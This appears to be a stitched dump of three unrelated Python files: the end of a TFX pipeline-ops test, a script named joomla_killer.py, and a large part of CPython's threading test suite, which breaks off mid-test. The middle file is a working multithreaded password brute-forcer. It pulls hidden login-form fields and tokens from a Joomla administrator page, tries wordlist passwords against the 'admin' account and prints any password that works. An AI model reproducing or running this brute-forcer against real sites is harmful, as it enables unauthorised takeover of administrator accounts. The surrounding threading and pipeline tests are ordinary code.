test_utils.create_node_uid('pipeline1', 'Transform'), task.node_uid)
# Load pipeline state and verify node stop initiation.
with pstate.PipelineState.load(m, pipeline_uid) as pipeline_state:
self.assertEqual(
finalize_reason,
pipeline_state.node_stop_initiated_reason(
task_lib.NodeUid(pipeline_uid=pipeline_uid, node_id='Trainer')))
def test_to_status_not_ok_error_decorator(self):
@pipeline_ops._to_status_not_ok_error
def fn1():
raise RuntimeError('test error 1')
@pipeline_ops._to_status_not_ok_error
def fn2():
raise status_lib.StatusNotOkError(
code=status_lib.Code.ALREADY_EXISTS, message='test error 2')
with self.assertRaisesRegex(status_lib.StatusNotOkError,
'test error 1') as ctxt:
fn1()
self.assertEqual(status_lib.Code.UNKNOWN, ctxt.exception.code)
with self.assertRaisesRegex(status_lib.StatusNotOkError,
'test error 2') as ctxt:
fn2()
self.assertEqual(status_lib.Code.ALREADY_EXISTS, ctxt.exception.code)
if __name__ == '__main__':
tf.test.main()
|
joomla_killer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import urllib2
import urllib
import cookielib
import threading
import sys
import Queue
from HTMLParser import HTMLParser
# common settings
user_thread = 10
username = "admin"
wordlist_file = "/tmp/cain.txt"
resume = None
# target-specific settings
target_url = "http://192.168.112.131/administrator/index.php"
target_post = "http://192.168.112.131/administrator/index.php"
username_field = "username"
password_field = "passwd"
success_check = "Administration - Control Panel"
class BruteParser(HTMLParser):
def __init__(self):
HTMLParser.__init__(self)
self.tag_results = {}
def handle_starttag(self, tag, attrs):
if tag == "input":
tag_name = None
tag_value = None
for name,value in attrs:
if name == "name":
tag_name = value
if name == "value":
tag_value = value
if tag_name is not None:
                self.tag_results[tag_name] = tag_value
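# Hedged usage sketch (not part of the original script): feeds a small inline
# form to BruteParser to show how the hidden input fields are collected before
# Bruter.web_bruter below parses the real login page.
def _demo_brute_parser():
    sample_form = '<form><input name="csrf_token" value="abc123" />' \
                  '<input name="return" value="index.php" /></form>'
    parser = BruteParser()
    parser.feed(sample_form)
    return parser.tag_results  # {"csrf_token": "abc123", "return": "index.php"}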
class Bruter(object):
def __init__(self, username, words):
self.username = username
self.password_q = words
self.found = False
print "Finished setting up for: %s" % username
def run_bruteforce(self):
for i in range(user_thread):
t = threading.Thread(target=self.web_bruter)
t.start()
def web_bruter(self):
while not self.password_q.empty() and not self.found:
brute = self.password_q.get().rstrip()
jar = cookielib.FileCookieJar("cookies")
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
response = opener.open(target_url)
page = response.read()
print "Trying: %s : %s (%d left)" % (self.username,brute,self.password_q.qsize())
            # parse the hidden fields from the login page
parser = BruteParser()
parser.feed(page)
post_tags = parser.tag_results
            # add the username and password fields
post_tags[username_field] = self.username
post_tags[password_field] = brute
login_data = urllib.urlencode(post_tags)
login_response = opener.open(target_post, login_data)
login_result = login_response.read()
if success_check in login_result:
self.found = True
print "[*] Bruteforce successful."
print "[*] Username: %s" % username
print "[*] Password: %s" % brute
print "[*] Waiting for other threads to exit..."
def build_wordlist(wordlist_file):
    # read in the wordlist; if `resume` is set, skip every word up to and
    # including it and continue with the next one
fd = open(wordlist_file,"rb")
raw_words = fd.readlines()
fd.close()
found_resume = False
words = Queue.Queue()
for word in raw_words:
word = word.rstrip()
if resume is not None:
if found_resume:
words.put(word)
else:
if word == resume:
found_resume = True
print "Resuming wordlist from: %s" % resume
else:
words.put(word)
return words
words = build_wordlist(wordlist_file)
bruter_obj = Bruter(username,words)
bruter_obj.run_bruteforce()
|
test_threading.py
|
"""
Tests for the threading module.
"""
import test.support
from test.support import threading_helper
from test.support import verbose, cpython_only
from test.support.import_helper import import_module
from test.support.script_helper import assert_python_ok, assert_python_failure
import random
import sys
import _thread
import threading
import time
import unittest
import weakref
import os
import subprocess
import signal
import textwrap
from unittest import mock
from test import lock_tests
from test import support
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('netbsd5', 'hp-ux11')
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print('task %s will run for %.1f usec' %
(self.name, delay * 1e6))
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print(self.nrunning.get(), 'tasks are running')
self.testcase.assertLessEqual(self.nrunning.get(), 3)
time.sleep(delay)
if verbose:
print('task', self.name, 'done')
with self.mutex:
self.nrunning.dec()
self.testcase.assertGreaterEqual(self.nrunning.get(), 0)
if verbose:
print('%s is finished. %d tasks are running' %
(self.name, self.nrunning.get()))
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = threading_helper.threading_setup()
def tearDown(self):
threading_helper.threading_cleanup(*self._threads)
test.support.reap_children()
class ThreadTests(BaseTestCase):
@cpython_only
def test_name(self):
def func(): pass
thread = threading.Thread(name="myname1")
self.assertEqual(thread.name, "myname1")
# Convert int name to str
thread = threading.Thread(name=123)
self.assertEqual(thread.name, "123")
# target name is ignored if name is specified
thread = threading.Thread(target=func, name="myname2")
self.assertEqual(thread.name, "myname2")
with mock.patch.object(threading, '_counter', return_value=2):
thread = threading.Thread(name="")
self.assertEqual(thread.name, "Thread-2")
with mock.patch.object(threading, '_counter', return_value=3):
thread = threading.Thread()
self.assertEqual(thread.name, "Thread-3")
with mock.patch.object(threading, '_counter', return_value=5):
thread = threading.Thread(target=func)
self.assertEqual(thread.name, "Thread-5 (func)")
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertIsNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, initial\)>$')
t.start()
if hasattr(threading, 'get_native_id'):
native_ids = set(t.native_id for t in threads) | {threading.get_native_id()}
self.assertNotIn(None, native_ids)
self.assertEqual(len(native_ids), NUMTASKS + 1)
if verbose:
print('waiting for all tasks to complete')
for t in threads:
t.join()
self.assertFalse(t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertIsNotNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, stopped -?\d+\)>$')
if verbose:
print('all tasks done')
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertIsNotNone(threading.currentThread().ident)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
with threading_helper.wait_threads_exit():
tid = _thread.start_new_thread(f, ())
done.wait()
self.assertEqual(ident[0], tid)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256 KiB)
def test_various_ops_small_stack(self):
if verbose:
print('with 256 KiB thread stack size...')
try:
threading.stack_size(262144)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1 MiB)
def test_various_ops_large_stack(self):
if verbose:
print('with 1 MiB thread stack size...')
try:
threading.stack_size(0x100000)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
with threading_helper.wait_threads_exit():
tid = _thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
            # Issue 29376
self.assertTrue(threading._active[tid].is_alive())
self.assertRegex(repr(threading._active[tid]), '_DummyThread')
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
ctypes = import_module("ctypes")
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
set_async_exc.argtypes = (ctypes.c_ulong, ctypes.py_object)
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = threading.get_ident()
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
try:
result = set_async_exc(tid, exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = threading.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print(" started worker thread")
# Try a thread id that doesn't make sense.
if verbose:
print(" trying nonsensical thread id")
result = set_async_exc(-1, exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print(" waiting for worker thread to get started")
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print(" verifying worker hasn't exited")
self.assertFalse(t.finished)
if verbose:
print(" attempting to raise asynch exception in worker")
result = set_async_exc(t.id, exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print(" waiting for worker to say it caught the exception")
worker_saw_exception.wait(timeout=support.SHORT_TIMEOUT)
self.assertTrue(t.finished)
if verbose:
print(" all OK -- joining worker")
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise threading.ThreadError()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(threading.ThreadError, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
def test_finalize_running_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
import_module("ctypes")
rc, out, err = assert_python_failure("-c", """if 1:
import ctypes, sys, time, _thread
# This lock is used as a simple event variable.
ready = _thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
_thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
""")
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
assert_python_ok("-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# test suite from hanging forever
def killer():
import os, time
time.sleep(2)
print('program blocked; aborting')
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
""")
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
rc, out, err = assert_python_ok("-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print("Woke up, sleep function is:", sleep)
threading.Thread(target=child).start()
raise SystemExit
""")
self.assertEqual(out.strip(),
b"Woke up, sleep function is: <built-in function sleep>")
self.assertEqual(err, b"")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getswitchinterval()
try:
for i in range(1, 100):
sys.setswitchinterval(i * 0.0002)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setswitchinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertIsNone(weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertIsNone(weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
def test_old_threading_api(self):
# Just a quick sanity check to make sure the old method names are
# still present
t = threading.Thread()
t.isDaemon()
t.setDaemon(True)
t.getName()
t.setName("name")
e = threading.Event()
e.isSet()
threading.activeCount()
def test_repr_daemon(self):
t = threading.Thread()
self.assertNotIn('daemon', repr(t))
t.daemon = True
self.assertIn('daemon', repr(t))
def test_daemon_param(self):
t = threading.Thread()
self.assertFalse(t.daemon)
t = threading.Thread(daemon=False)
self.assertFalse(t.daemon)
t = threading.Thread(daemon=True)
self.assertTrue(t.daemon)
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
# Issue #14308: a dummy thread in the active list doesn't mess up
# the after-fork mechanism.
code = """if 1:
import _thread, threading, os, time
def background_thread(evt):
# Creates and registers the _DummyThread instance
threading.current_thread()
evt.set()
time.sleep(10)
evt = threading.Event()
_thread.start_new_thread(background_thread, (evt,))
evt.wait()
assert threading.active_count() == 2, threading.active_count()
if os.fork() == 0:
assert threading.active_count() == 1, threading.active_count()
os._exit(0)
else:
os.wait()
"""
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
# Try hard to trigger #18418: is_alive() could sometimes be True on
# threads that vanished after a fork.
old_interval = sys.getswitchinterval()
self.addCleanup(sys.setswitchinterval, old_interval)
# Make the bug more likely to manifest.
test.support.setswitchinterval(1e-6)
for i in range(20):
t = threading.Thread(target=lambda: None)
t.start()
pid = os.fork()
if pid == 0:
os._exit(11 if t.is_alive() else 10)
else:
t.join()
support.wait_process(pid, exitcode=10)
def test_main_thread(self):
main = threading.main_thread()
self.assertEqual(main.name, 'MainThread')
self.assertEqual(main.ident, threading.current_thread().ident)
self.assertEqual(main.ident, threading.get_ident())
def f():
self.assertNotEqual(threading.main_thread().ident,
threading.current_thread().ident)
th = threading.Thread(target=f)
th.start()
th.join()
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork(self):
code = """if 1:
import os, threading
from test import support
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
else:
support.wait_process(pid, exitcode=0)
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "MainThread\nTrue\nTrue\n")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork_from_nonmain_thread(self):
code = """if 1:
import os, threading, sys
from test import support
def func():
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
# stdout is fully buffered because not a tty,
# we have to flush before exit.
sys.stdout.flush()
else:
support.wait_process(pid, exitcode=0)
th = threading.Thread(target=func)
th.start()
th.join()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "Thread-1 (func)\nTrue\nTrue\n")
def test_main_thread_during_shutdown(self):
# bpo-31516: current_thread() should still point to the main thread
# at shutdown
code = """if 1:
import gc, threading
main_thread = threading.current_thread()
assert main_thread is threading.main_thread() # sanity check
class RefCycle:
def __init__(self):
self.cycle = self
def __del__(self):
print("GC:",
threading.current_thread() is main_thread,
threading.main_thread() is main_thread,
threading.enumerate() == [main_thread])
RefCycle()
gc.collect() # sanity check
x = RefCycle()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode()
self.assertEqual(err, b"")
self.assertEqual(data.splitlines(),
["GC: True True True"] * 2)
def test_finalization_shutdown(self):
# bpo-36402: Py_Finalize() calls threading._shutdown() which must wait
# until Python thread states of all non-daemon threads get deleted.
#
# Test similar to SubinterpThreadingTests.test_threads_join_2(), but
# test the finalization of the main interpreter.
code = """if 1:
import os
import threading
import time
import random
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_Finalize() is called.
random_sleep()
tls.x = Sleeper()
random_sleep()
threading.Thread(target=f).start()
random_sleep()
"""
rc, out, err = assert_python_ok("-c", code)
self.assertEqual(err, b"")
def test_tstate_lock(self):
# Test an implementation detail of Thread objects.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
time.sleep(0.01)
# The tstate lock is None until the thread is started
t = threading.Thread(target=f)
self.assertIs(t._tstate_lock, None)
t.start()
started.acquire()
self.assertTrue(t.is_alive())
# The tstate lock can't be acquired when the thread is running
# (or suspended).
tstate_lock = t._tstate_lock
self.assertFalse(tstate_lock.acquire(timeout=0), False)
finish.release()
# When the thread ends, the state_lock can be successfully
# acquired.
self.assertTrue(tstate_lock.acquire(timeout=support.SHORT_TIMEOUT), False)
# But is_alive() is still True: we hold _tstate_lock now, which
# prevents is_alive() from knowing the thread's end-of-life C code
# is done.
self.assertTrue(t.is_alive())
# Let is_alive() find out the C code is done.
tstate_lock.release()
self.assertFalse(t.is_alive())
# And verify the thread disposed of _tstate_lock.
self.assertIsNone(t._tstate_lock)
t.join()
def test_repr_stopped(self):
# Verify that "stopped" shows up in repr(Thread) appropriately.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
t = threading.Thread(target=f)
t.start()
started.acquire()
self.assertIn("started", repr(t))
finish.release()
# "stopped" should appear in the repr in a reasonable amount of time.
# Implementation detail: as of this writing, that's trivially true
# if .join() is called, and almost trivially true if .is_alive() is
# called. The detail we're testing here is that "stopped" shows up
# "all on its own".
LOOKING_FOR = "stopped"
for i in range(500):
if LOOKING_FOR in repr(t):
break
time.sleep(0.01)
self.assertIn(LOOKING_FOR, repr(t)) # we waited at least 5 seconds
t.join()
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should raise ValueError if released too often.
for limit in range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
threads = [threading.Thread(target=bs.release)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertRaises(ValueError, bs.release)
@cpython_only
def test_frame_tstate_tracing(self):
# Issue #14432: Crash when a generator is created in a C thread that is
# destroyed while the generator is still used. The issue was that a
# generator contains a frame, and the frame kept a reference to the
# Python state of the destroyed C thread. The crash occurs when a trace
# function is setup.
def noop_trace(frame, event, arg):
# no operation
return noop_trace
def generator():
while 1:
yield "generator"
def callback():
if callback.gen is None:
callback.gen = generator()
return next(callback.gen)
callback.gen = None
old_trace = sys.gettrace()
sys.settrace(noop_trace)
try:
# Install a trace function
threading.settrace(noop_trace)
# Create a generator in a C thread which exits after the call
import _testcapi
_testcapi.call_in_temporary_c_thread(callback)
# Call the generator in a different Python thread, check that the
# generator didn't keep a reference to the destroyed thread state
for test in range(3):
# The trace function is still called here
callback()
finally:
sys.settrace(old_trace)
def test_gettrace(self):
def noop_trace(frame, event, arg):
# no operation
return noop_trace
old_trace = threading.gettrace()
try:
threading.settrace(noop_trace)
trace_func = threading.gettrace()
self.assertEqual(noop_trace,trace_func)
finally:
threading.settrace(old_trace)
def test_getprofile(self):
def fn(*args): pass
old_profile = threading.getprofile()
try:
threading.setprofile(fn)
self.assertEqual(fn, threading.getprofile())
finally:
threading.setprofile(old_profile)
@cpython_only
def test_shutdown_locks(self):
for daemon in (False, True):
with self.subTest(daemon=daemon):
event = threading.Event()
thread = threading.Thread(target=event.wait, daemon=daemon)
# Thread.start() must add lock to _shutdown_locks,
# but only for non-daemon thread
thread.start()
tstate_lock = thread._tstate_lock
if not daemon:
self.assertIn(tstate_lock, threading._shutdown_locks)
else:
self.assertNotIn(tstate_lock, threading._shutdown_locks)
# unblock the thread and join it
event.set()
thread.join()
# Thread._stop() must remove tstate_lock from _shutdown_locks.
# Daemon threads must never add it to _shutdown_locks.
self.assertNotIn(tstate_lock, threading._shutdown_locks)
def test_locals_at_exit(self):
# bpo-19466: thread locals must not be deleted before destructors
# are called
rc, out, err = assert_python_ok("-c", """if 1:
import threading
class Atexit:
def __del__(self):
print("thread_dict.atexit = %r" % thread_dict.atexit)
thread_dict = threading.local()
thread_dict.atexit = "value"
atexit = Atexit()
""")
self.assertEqual(out.rstrip(), b"thread_dict.atexit = 'value'")
class ThreadJoinOnShutdown(BaseTestCase):
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print('end of thread')
# stdout is fully buffered because not a tty, we have to flush
# before exit.
sys.stdout.flush()
\n""" + script
rc, out, err = assert_python_ok("-c", script)
data = out.decode().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
from test import support
childpid = os.fork()
if childpid != 0:
# parent process
support.wait_process(childpid, exitcode=0)
sys.exit(0)
# child process
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
from test import support
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
# parent process
support.wait_process(childpid, exitcode=0)
sys.exit(0)
# child process
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print('end of main')
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_daemon_threads(self):
# Check that a daemon thread cannot crash the interpreter on shutdown
# by manipulating internal structures that are being disposed of in
# the main thread.
script = """if True:
import os
import random
import sys
import time
import threading
thread_has_run = set()
def random_io():
'''Loop for a while sleeping random tiny amounts and doing some I/O.'''
while True:
with open(os.__file__, 'rb') as in_f:
stuff = in_f.read(200)
with open(os.devnull, 'wb') as null_f:
null_f.write(stuff)
time.sleep(random.random() / 1995)
thread_has_run.add(threading.current_thread())
def main():
count = 0
for _ in range(40):
new_thread = threading.Thread(target=random_io)
new_thread.daemon = True
new_thread.start()
count += 1
while len(thread_has_run) < count:
time.sleep(0.001)
# Trigger process shutdown
sys.exit(0)
main()
"""
rc, out, err = assert_python_ok('-c', script)
self.assertFalse(err)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock in a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process and wait it
pid = os.fork()
if pid > 0:
support.wait_process(pid, exitcode=50)
else:
os._exit(50)
# start a bunch of threads that will fork() child processes
threads = []
for i in range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
for t in threads:
t.join()
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_clear_threads_states_after_fork(self):
# Issue #17094: check that threads states are cleared after fork()
# start a bunch of threads
threads = []
for i in range(16):
t = threading.Thread(target=lambda : time.sleep(0.3))
threads.append(t)
t.start()
pid = os.fork()
if pid == 0:
# check that threads states have been cleared
if len(sys._current_frames()) == 1:
os._exit(51)
else:
os._exit(52)
else:
support.wait_process(pid, exitcode=51)
for t in threads:
t.join()
class SubinterpThreadingTests(BaseTestCase):
def pipe(self):
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
if hasattr(os, 'set_blocking'):
os.set_blocking(r, False)
return (r, w)
def test_threads_join(self):
# Non-daemon threads should be joined at subinterpreter shutdown
# (issue #18808)
r, w = self.pipe()
code = textwrap.dedent(r"""
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,))
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
def test_threads_join_2(self):
# Same as above, but a delay gets introduced after the thread's
# Python code returned but before the thread state is deleted.
# To achieve this, we register a thread-local object which sleeps
# a bit when deallocated.
r, w = self.pipe()
code = textwrap.dedent(r"""
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
tls.x = Sleeper()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,))
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
@cpython_only
def test_daemon_threads_fatal_error(self):
subinterp_code = f"""if 1:
import os
import threading
import time
def f():
# Make sure the daemon thread is still running when
# Py_EndInterpreter is called.
time.sleep({test.support.SHORT_TIMEOUT})
threading.Thread(target=f, daemon=True).start()
"""
script = r"""if 1:
import _testcapi
_testcapi.run_in_subinterp(%r)
""" % (subinterp_code,)
with test.support.SuppressCrashReport():
rc, out, err = assert_python_failure("-c", script)
self.assertIn("Fatal Python error: Py_EndInterpreter: "
"not the last thread", err.decode())
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
thread.join()
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join)
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
thread.join()
def test_releasing_unacquired_lock(self):
lock = threading.Lock()
self.assertRaises(RuntimeError, lock.release)
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X or FreeBSD which have small default stack sizes
# for threads
script = """if True:
import threading
def recurse():
return recurse()
def outer():
try:
recurse()
except RecursionError:
pass
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error: " + stderr.decode())
self.assertEqual(data, expected_output)
def test_print_exception(self):
script = r"""if True:
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_1(self):
